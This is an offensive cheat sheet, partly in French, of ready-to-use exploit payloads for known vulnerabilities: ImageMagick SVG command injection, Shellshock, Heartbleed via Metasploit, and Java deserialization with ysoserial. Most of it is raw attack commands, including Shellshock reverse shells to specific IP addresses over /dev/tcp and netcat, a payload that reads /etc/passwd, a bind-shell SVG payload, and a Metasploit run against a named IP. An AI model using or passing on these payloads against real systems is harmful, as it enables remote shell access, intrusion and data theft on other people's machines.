CVE & Vulns exploits

Imagick - CVE-2016-3718 - SSRF

Dans un .svg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)'
pop graphic-context

Shellshock - CVE-2014-6271

Apache mod_cgi or any CGI information ? Could be vulnerable to shellshock
# Shellshock == CVE-2014-6271

# Classic PoC
curl -H "User-Agent: () { :; }; /bin/command" http://example.com/
() {:;}; /bin/cat /etc/passwd

# Reverse shell
() { :; }; /bin/sh -c /bin/sh -i  >& /dev/tcp/139.99.169.198/51337 0>&1 &

# Reverse Shell
curl -H "User-Agent: () { :;};echo content-type:text/plain;echo;/bin/nc 51.75.29.235 2222 -e /bin/bash;echo;exit" http://vuln.com/script.cgi

# Automatic tool : shellshocker.py
https://github.com/liamim/shellshocker

Heartbleed - CVE-2014-0160

# Some github repository provides functionnal PoC
https://github.com/mpgn/heartbleed-PoC

# Exploit using MetaSploit
> use auxiliary/scanner/ssl/openssl_heartbleed
> set RHOSTS 51.75.202.113:1073
> set RPORT 1073
> set TLS_VERSION 1.2

# Note - Ne pas oublier de modifier la verbosité afin de récupérer les données
> set verbose true

> exploit

Java Deserialization

https://artsploit.blogspot.com/2016/01/paypal-rce.html
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Deserialization
https://github.com/frohoff/ysoserial

# You can generate payloads to exploit unsafe Java deserialization
java -jar ysoserial.jar CommonsCollections1
'your command' | base64

java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
nc 10.10.10.10 1099 < groovypayload.bin
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe